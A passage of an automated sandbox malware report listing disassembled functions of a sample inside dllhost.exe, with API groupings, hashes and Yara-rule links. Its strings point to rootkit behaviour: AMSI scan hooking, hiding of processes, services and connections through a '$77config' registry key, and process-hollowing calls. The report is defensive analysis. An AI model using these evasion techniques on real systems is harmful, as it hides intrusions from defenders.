                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                                                                                                  • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                                                                                                  • API String ID: 1036100660-1371749706
                                                                                                                                  • Opcode ID: 68291d7602cf7908561aa6de77c090830a4c2d77d468ef80d8c206617ccbe223
                                                                                                                                  • Instruction ID: 0d953b453a7ccc827914765d8e6f66035b70b324b962251ad8a05cdcd083286d
                                                                                                                                  • Opcode Fuzzy Hash: 68291d7602cf7908561aa6de77c090830a4c2d77d468ef80d8c206617ccbe223
                                                                                                                                  • Instruction Fuzzy Hash: D1D13BB2304A8187EB65CF63F84479AB7A1F788BC8F044025EB8A57BA4DF78D555CB04
                                                                                                                                  Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136memoryregistrystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 2005889112-2564639436
                                                                                                                                  • Opcode ID: ff4126b3c9a217e75168e29ba5c6ce306ab8e03ba8bc4bb8c5660df2a6a1b84b
                                                                                                                                  • Instruction ID: 9dfe64d658352555665290a27f53dd6e0bb04f4a6149878949c37a62fff048fe
                                                                                                                                  • Opcode Fuzzy Hash: ff4126b3c9a217e75168e29ba5c6ce306ab8e03ba8bc4bb8c5660df2a6a1b84b
                                                                                                                                  • Instruction Fuzzy Hash: D65138B2604B8086EB56DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710
                                                                                                                                  Function 00000290EDD02DD0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 252stringlibraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$FileHandleNameProcess$AddressCloseFindImageModuleOpenPathProc
                                                                                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                  • API String ID: 3153948470-3850299575
                                                                                                                                  • Opcode ID: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
                                                                                                                                  • Instruction ID: 8d76f19b15ef80c2c76533e88aa87a1e1fbd472d17141bfec91230901297ad3d
                                                                                                                                  • Opcode Fuzzy Hash: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
                                                                                                                                  • Instruction Fuzzy Hash: A3A10872A197988AEB64CF26C588769B7A6FF84B84F009816EE8D53794DF35CC84C340
                                                                                                                                  Function 00000290EDD08270 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                  • Opcode ID: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction ID: 76f1b76557581135c53ace58c3509cb8edd5f998801ed0647c9094a62feece94
                                                                                                                                  • Opcode Fuzzy Hash: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction Fuzzy Hash: A5315C72619B848AEB609F60E8C47EE7375FB84744F44482ADB8E47B98DF78C658C710
                                                                                                                                  Function 00000290EDD0CB40 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                  • Opcode ID: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction ID: 978619f4fde00c34c5696f6af0686afc0af4c1ae2adc48a70d718f6dc0054768
                                                                                                                                  • Opcode Fuzzy Hash: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction Fuzzy Hash: 65417F32618F848AE760CF64E8887AE73A1FBC8754F540A25EACD47B98DF78C555CB00
                                                                                                                                  Function 00000290EDD0D7D8 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1164774033-0
                                                                                                                                  • Opcode ID: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
                                                                                                                                  • Instruction ID: 08555593e6135383e5c5f7d9a0198d12c94cba828a725cfbcf0508dbdfbf3401
                                                                                                                                  • Opcode Fuzzy Hash: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
                                                                                                                                  • Instruction Fuzzy Hash: F0A1C822F0C6884DFB20DB75E4C83AD7BA2EBC1B94F545516DED927E99DA38C442C700
                                                                                                                                  Function 00000290EDD01724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                  • String ID: SOFTWARE\$77config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                  • API String ID: 2135414181-649645306
                                                                                                                                  • Opcode ID: 450dbbf1704afe51d16eaedd2f846ad832dc3a6968aef11f1843edb122fe1598
                                                                                                                                  • Instruction ID: de8c77d11b034eb0f69407b1bc6f068470c06193070f456624de45bc04d01c9d
                                                                                                                                  • Opcode Fuzzy Hash: 450dbbf1704afe51d16eaedd2f846ad832dc3a6968aef11f1843edb122fe1598
                                                                                                                                  • Instruction Fuzzy Hash: ED712926B15A598AEB10DFA5E8D879D33B5FF84B88F405A11DE8D87B68DF38C544C340
                                                                                                                                  Function 000000014000151C Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                                                                                                  • String ID: SOFTWARE\$77config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                  • API String ID: 3993315683-649645306
                                                                                                                                  • Opcode ID: bb05c43e93748f50594b3ad6e02ce732bcd3ee054633caa6f484a4195ccb8fef
                                                                                                                                  • Instruction ID: 14db8fe0868c42e50b21d548efc6ed9987b7e0323b8c724050378e7ece0a3ec2
                                                                                                                                  • Opcode Fuzzy Hash: bb05c43e93748f50594b3ad6e02ce732bcd3ee054633caa6f484a4195ccb8fef
                                                                                                                                  • Instruction Fuzzy Hash: D971D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                                                                                                                  Function 00000290EDD01E38 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00000290EDD01E43
                                                                                                                                    • Part of subcall function 00000290EDD021BC: GetModuleHandleA.KERNEL32(?,?,?,00000290EDD01E75), ref: 00000290EDD021D4
                                                                                                                                    • Part of subcall function 00000290EDD021BC: GetProcAddress.KERNEL32(?,?,?,00000290EDD01E75), ref: 00000290EDD021E5
                                                                                                                                    • Part of subcall function 00000290EDD06030: GetCurrentThreadId.KERNEL32 ref: 00000290EDD0606B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                                                                                  • API String ID: 4175298099-4225371247
                                                                                                                                  • Opcode ID: 6191e1ab36bf222c83b8ad8c498c744b26cf75ee4eb45f907204208c319144d1
                                                                                                                                  • Instruction ID: 3edce7900b5e877263305532d02166349a8cd539643f9a91b5d5ddf4bc2caf99
                                                                                                                                  • Opcode Fuzzy Hash: 6191e1ab36bf222c83b8ad8c498c744b26cf75ee4eb45f907204208c319144d1
                                                                                                                                  • Instruction Fuzzy Hash: B141A2A4E0EA5EACEA05EFA9EDCD7D47722EF81344F805C13D489021B5DE79C64AC390
                                                                                                                                  Function 00000290EDD012B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 2005889112-2564639436
                                                                                                                                  • Opcode ID: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
                                                                                                                                  • Instruction ID: ac7f6135d3bc031beaf6da2db3186c4f1826e06b18312079fa2d298ad9231125
                                                                                                                                  • Opcode Fuzzy Hash: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
                                                                                                                                  • Instruction Fuzzy Hash: F0515072A19B888AE715CF62E48C35A77B5FB89F98F444924DE8A47768DF3CC049C700
                                                                                                                                  Function 00000290EDD0ED48 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                                                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                                                                  • API String ID: 740688525-1880043860
                                                                                                                                  • Opcode ID: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction ID: 2e9617689a32c8a02eeeb05ff9920475a55d20eb85685a36819b6afde0f54432
                                                                                                                                  • Opcode Fuzzy Hash: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction Fuzzy Hash: 7E51D421B0970C99EA159BA6A8883993366FF89BB0F480F25DEBD477D4DF38C4458340
                                                                                                                                  Function 00000290EDD03178 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                                                                                  • API String ID: 1943346504-1805530042
                                                                                                                                  • Opcode ID: 1e0206962784cbb59066502de87d8a89b87f36d7e7391f794394394ba1b10176
                                                                                                                                  • Instruction ID: 49e94dcb3391da6b0385502d87e26d78c7b50b2316f3dec3604bbd9dd3acbeee
                                                                                                                                  • Opcode Fuzzy Hash: 1e0206962784cbb59066502de87d8a89b87f36d7e7391f794394394ba1b10176
                                                                                                                                  • Instruction Fuzzy Hash: 0531A522E08B589AE711DF62A88C759B3A1FFC8BD4F444A24EECD43A64DF3CC5568740
                                                                                                                                  Function 00000290EDD03288 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                                                                                  • API String ID: 1943346504-3507739905
                                                                                                                                  • Opcode ID: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction ID: a4dd49ce4cbc28840add1cb7dc4899e3cfda13faac20740a1bce9bf1cd559cbf
                                                                                                                                  • Opcode Fuzzy Hash: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction Fuzzy Hash: FF317A26E18B498AEB10DF62A8C875AB3A6FFC5F84F444925DE8A43734DF38D456C700
                                                                                                                                  Function 000000014000220C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4184240511-0
                                                                                                                                  • Opcode ID: b3251da8290bbac3b162c96b741c7c54804fb0e9f3ba261baabe9ec2fcce5d14
                                                                                                                                  • Instruction ID: 60e6dbc571274f66831ba4b946aa5f611256291b0e6fc880edfcfd2fe37b3460
                                                                                                                                  • Opcode Fuzzy Hash: b3251da8290bbac3b162c96b741c7c54804fb0e9f3ba261baabe9ec2fcce5d14
                                                                                                                                  • Instruction Fuzzy Hash: A54147B2700A859AE711CF6AE8843DD73B1FB89B89F445225BF0A47A69DF38C159C300
                                                                                                                                  Function 00000290EDB093EC Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000003.1687327537.00000290EDB00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000290EDB00000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_3_290edb00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction ID: 724aaa8d7341831bf1dfc85d0cd23e1324cd1f876679b3aa7097471a52462621
                                                                                                                                  • Opcode Fuzzy Hash: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction Fuzzy Hash: FFD1907A604B48CEEF60DF25D48839E77A2FB49788F180915EEC95BB96EB34C181C700
                                                                                                                                  Function 00000290EDD09FEC Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction ID: eaff9780fdd0ebd37a5d8776354dcddb21e6ed844a41ebd33b21c7ee74830345
                                                                                                                                  • Opcode Fuzzy Hash: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction Fuzzy Hash: E4D1AE36A08B888EEB20DF65D4883DD77A6FBC5788F145916EEC957B9ACB34C481C701
                                                                                                                                  Function 00000290EDD0104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
